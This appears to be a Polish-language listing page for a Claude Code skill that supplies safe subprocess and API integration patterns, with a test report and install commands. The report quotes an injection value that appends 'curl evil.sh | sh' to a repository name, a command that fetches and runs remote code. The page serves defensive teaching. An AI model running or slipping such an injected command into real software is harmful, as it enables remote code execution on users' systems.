API Integration Patterns
Bezpieczne dla podprocesów wzorce API/CLI: brak shell=True, biała lista poleceń, cofanie ponawiania prób, walidacja tokenów.
Testowano · Działa
Co robi ten skill
Umiejętność wzorców referencyjnych, która dostarcza bezpieczne wzorce kodu dla podprocesów, GitHub CLI, ponawiania prób z cofaniem, uwierzytelniania i ograniczania przepustowości, gdy Claude pisze kod integracji zewnętrznego API lub CLI. Uruchamia się na słowa kluczowe subprocess/gh-cli/API-call/retry/auth i wyraźnie wyklucza edycje wewnętrznych funkcji lub tylko konfiguracji.
Raport z testu
Rzeczywisty test CWE-78: kod bazowy używał shell=True z nazwą repozytorium w f-stringu, pozwalając spreparowanej wartości repozytorium dodać 'curl evil.sh | sh'; wersja umiejętności z tablicą argv + shell=False przepuściła ten sam złośliwy ciąg znaków przez gh jako jeden nieaktywny argument. Konkretne, nie kosmetyczne.
Testowano: 2026-07-15 · Claude Code 2.x (agent harness)
Instalacja
git clone https://github.com/akaszubski/autonomous-dev cd autonomous-dev mkdir -p ~/.claude/skills cp -r plugins/autonomous-dev/skills/api-integration-patterns ~/.claude/skills/api-integration-patterns
Komendy i przykładowe prompty
/api-integration-patternsBezpieczne dla podprocesów wzorce API/CLI: brak shell=True, biała lista poleceń, cofanie ponawiania prób, walidacja tokenów.
Skille uruchamiają się na zwykłe polecenia — bez komend do zapamiętania. Po instalacji aktywują go prompty takie jak te (po angielsku):
Write a Python function that lists GitHub issues via the gh CLIAdd retry logic with exponential backoff to my API client codeHelp me safely handle subprocess calls without shell injection risk